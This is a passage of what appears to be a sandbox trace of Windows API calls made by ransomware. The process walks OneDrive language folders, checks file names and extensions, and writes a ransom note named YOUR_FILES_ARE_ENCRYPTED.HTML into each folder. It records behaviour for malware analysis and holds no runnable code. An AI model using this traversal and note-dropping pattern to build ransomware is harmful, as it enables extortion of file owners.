[0161.552] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.552] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.552] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.552] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\hr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.553] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.555] CloseHandle (hObject=0x594) returned 1 [0161.556] GetProcessHeap () returned 0x270000 [0161.557] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.557] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="hu", cAlternateFileName="")) returned 1 [0161.557] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu") returned 74 [0161.557] GetProcessHeap () returned 0x270000 [0161.557] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.557] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu" [0161.557] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\*" [0161.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 
0x42f3280 [0161.567] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9fad30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.567] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.567] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.567] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.568] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.568] lstrlenW (lpString=".mui") returned 4 [0161.568] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.568] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaabc3db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xaabc3db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.568] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.568] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\hu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.569] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.571] CloseHandle (hObject=0x594) returned 1 [0161.572] GetProcessHeap () returned 0x270000 [0161.572] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.573] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="hy", cAlternateFileName="")) returned 1 [0161.573] wnsprintfW (in: 
pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy") returned 74 [0161.573] GetProcessHeap () returned 0x270000 [0161.573] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.573] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy" [0161.573] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\*" [0161.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.575] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaabc3db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.575] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.575] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.575] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.575] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.575] lstrlenW (lpString=".mui") returned 4 [0161.575] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.575] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadd90f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadd90f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.575] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.576] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | 
out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\hy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.576] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.579] CloseHandle (hObject=0x594) returned 1 [0161.579] GetProcessHeap () returned 0x270000 [0161.580] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.580] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="id", cAlternateFileName="")) returned 1 [0161.580] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id") returned 74 [0161.580] GetProcessHeap () returned 0x270000 [0161.580] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.580] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id" [0161.580] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\*" [0161.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.582] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadd90f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.582] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.582] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.582] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.582] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.582] lstrlenW (lpString=".mui") returned 4 [0161.583] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.583] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaafee430, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaafee430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.583] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.583] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\id\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\id\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.583] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.586] CloseHandle (hObject=0x594) returned 1 [0161.586] GetProcessHeap () returned 0x270000 [0161.587] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.587] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ig-ng", cAlternateFileName="")) returned 1 [0161.587] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng") returned 77 [0161.587] GetProcessHeap () returned 0x270000 [0161.587] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.587] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng" [0161.588] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\*" [0161.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.588] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaafee430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.588] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x10eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 
[0161.588] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.588] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.588] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.588] lstrlenW (lpString=".mui") returned 4 [0161.588] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.588] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab191350, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab191350, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x10eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.588] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.589] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ig-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ig-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.589] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, 
